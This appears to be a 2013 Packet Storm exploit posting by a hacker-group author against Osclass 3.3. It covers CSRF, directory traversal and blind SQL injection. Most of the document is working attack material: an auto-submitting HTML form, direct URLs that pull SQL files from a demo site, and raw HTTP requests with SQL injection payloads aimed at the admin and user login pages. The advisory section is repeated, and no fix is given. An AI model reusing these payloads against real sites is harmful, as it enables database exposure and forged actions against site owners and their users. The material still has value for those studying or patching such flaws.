Osclass 3.3 Cross Site Request Forgery / SQL Injection / Traversal

2013-12-14T00:00:00
ID PACKETSTORM:124437
Type packetstorm
Reporter R3d-D3v!L
Modified 2013-12-14T00:00:00

Description

                                        
                                            `=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
[~] Vendor: http://osclass.org   
[+] Software:Osclass  
[+] Version : 3.3  
[~]   
[~] author: R3d-D3v!L  
[+] TEAM: ABH   
[?] contact: X[at]hotmail.co.jp   
[-]   
[?] Date: 14.d3c.2ol3   
[?] T!ME: 04:54 am GMT   
[?] Home: soon  
[^]   
[?]  
===============================================================================   
#Osclass v3.3 suffering from CSRF Vulnerability  
===============================================================================   
  
  
[!] Exploit Already Tested ... on apache  
  
[^] Error console:- /general/index.php   
  
[?] proof of concept :  
  
<html>  
<body onload="javascript:document.forms[0].submit()">  
<form name="<empty>" action="http://demo.osclass.org/general/index.php" method=GET enctype="multipart/form-data">  
  
  
<input type=hidden size=30 maxlength=30 name=page value="">  
  
<input type=hidden size=30 maxlength=30 name=sOrder value="">  
  
<input type=hidden size=30 maxlength=30 name=iOrderType value="">  
  
<td><input type=text size=30 maxlength=250 name=sPattern value=""></td>  
  
<td><input type=text size=30 maxlength=100 name=sCity value=""></td>  
  
<td><input type=text size=30 maxlength=100 name=sRegion value=""></td>  
  
<td><input type=Checkbox size=10 maxlength=10 name=bPic value=""></td>  
  
<td><input type=text size=30 maxlength=250 name=sPriceMin value=""></td>  
  
<td><input type=text size=30 maxlength=100 name=sPriceMax value=""></td>  
  
<td><input type=Checkbox size=10 maxlength=10 name=sCategory value=""></td>  
  
<input type=submit class=button value='Save'>  
</form>  
</html>  
  
  
===============================================================================   
#Osclass v3.3 suffering from directory traversal Vulnerability  
===============================================================================   
  
  
[!] Exploit Already Tested ... on apache  
  
[^] Error console:- directory traversal allow to dump db   
  
[?] proof of concept :  
  
  
/general/oc-content/languages/en_US/mail.sql  
  
/general/oc-includes/osclass/installer/basic_data.sql  
  
/general/oc-includes/osclass/installer/pages.sql  
  
  
[?]live exploit  
  
http://demo.osclass.org/general/oc-content/languages/en_US/mail.sql  
  
  
===============================================================================   
#Osclass v3.3 suffering from Blind sql injection Vulnerability  
===============================================================================   
  
  
[!] Exploit Already Tested ... on apache  
  
[^] Error console:-  
  
1*-URL encoded GET input action was set to -1' or 18 = '16  
  
2*-URL encoded POST input action was set to -1" or 34 = "31  
  
[?] proof of concept :  
  
  
1* - /general/oc-admin/index.php  
2* - /general/index.php1*-  
RequestGET /general/oc-admin/index.php?action=-1%27%20or%2018%20%3d%20%2716&page=login HTTP/1.1  
X-Requested-With: XMLHttpRequest  
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2; 9abe5=oc_adminId._.oc_adminSecret._.oc_adminLocale%261._.7VIeKmoH._.it_IT  
Host: demo.osclass.org  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)  
Accept: */*  
  
  
  
2*-  
  
POST /general/index.php HTTP/1.1  
Content-Length: 246  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2  
Host: demo.osclass.org  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)  
Accept: */*  
  
action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst  
  
  
[~]-----------------------------{(ƦȜd-DΣV!L)}------------------------------------------------  
#   
[~] Greetz tO: virus_jordan & & H@CK3R M!ND & Syrianoo ĦąĈkỉŋg & ĦǒĿǻkő ẾŁếstorầ & Netikerty Asenet ...etc ;  
#   
[~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ;  
#   
[~] special thanks :all soqor members & xp10 # ;  
#   
[?] special SupPoRT : packet storm & 1337day & Maksymilian Arciemowicz # ;  
#   
[?]---> ((R3d D3v!L<---palestine phoneix--->JUPA<---aNd--->Devil ro0t)) #;   
#   
[~]spechial FR!ND: they all are spechials ;) #;   
#   
[~] !'M 4R48!4N 3XPL0!73R. #;   
#   
[~](>D!R 4ll 0R D!E<) #;   
#   
[~]---------------------------------------------------------------------------------------------   
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-  
[~] Tybe: suffering from CSRF Vulnerability  
[~] Vendor: http://osclass.org   
[+] Software:Osclass  
[+] Version : 3.3  
[~]   
[~] author: R3d-D3v!L  
[+] TEAM: ABH   
[?] contact: X[at]hotmail.co.jp   
[-]   
[?] Date: 14.d3c.2ol3   
[?] T!ME: 04:54 am GMT   
[?] Home: soon  
[^]   
[?]  
===============================================================================   
#Osclass v3.3 suffering from Blind sql injection Vulnerability  
===============================================================================   
  
  
[!] Exploit Already Tested ... on apache  
  
[^] Error console:-  
  
1*-URL encoded GET input action was set to -1' or 18 = '16  
  
2*-URL encoded POST input action was set to -1" or 34 = "31  
  
[?] proof of concept :  
  
  
1* - /general/oc-admin/index.php  
2* - /general/index.php1*-  
RequestGET /general/oc-admin/index.php?action=-1%27%20or%2018%20%3d%20%2716&page=login HTTP/1.1  
X-Requested-With: XMLHttpRequest  
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2; 9abe5=oc_adminId._.oc_adminSecret._.oc_adminLocale%261._.7VIeKmoH._.it_IT  
Host: demo.osclass.org  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)  
Accept: */*  
  
  
  
2*-  
  
POST /general/index.php HTTP/1.1  
Content-Length: 246  
Content-Type: application/x-www-form-urlencoded  
X-Requested-With: XMLHttpRequest  
Cookie: osclass=1cdd2642f3187eedcfa8b959300d08e2  
Host: demo.osclass.org  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)  
Accept: */*  
  
action=-1%22%20or%2034%20%3d%20%2231&CSRFName=CSRF83497906_1588898183&CSRFToken=dbdd20b65f0a882be3c6629ec1d975be69c2668cdb8e75aa2b5a42f5d031b66cbaf4073567b352024e09fe04ba358c6186d1e58e1493822005a88893363a1f9d&page=login&s_email=sample%40email.tst  
  
  
[~]-----------------------------{(ƦȜd-DΣV!L)}------------------------------------------------  
#   
[~] Greetz tO: virus_jordan & & H@CK3R M!ND & Syrianoo ĦąĈkỉŋg & ĦǒĿǻkő ẾŁếstorầ & Netikerty Asenet ...etc ;  
#   
[~] 70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ # ;  
#   
[~] special thanks :all soqor members & xp10 # ;  
#   
[?] special SupPoRT : packet storm & 1337day & Maksymilian Arciemowicz # ;  
#   
[?]---> ((R3d D3v!L<---palestine phoneix--->JUPA<---aNd--->Devil ro0t)) #;   
#   
[~]spechial FR!ND: they all are spechials ;) #;   
#   
[~] !'M 4R48!4N 3XPL0!73R. #;   
#   
[~](>D!R 4ll 0R D!E<) #;   
#   
[~]---------------------------------------------------------------------------------------------   
  
  
  
  
  
  
  
  
  
  
`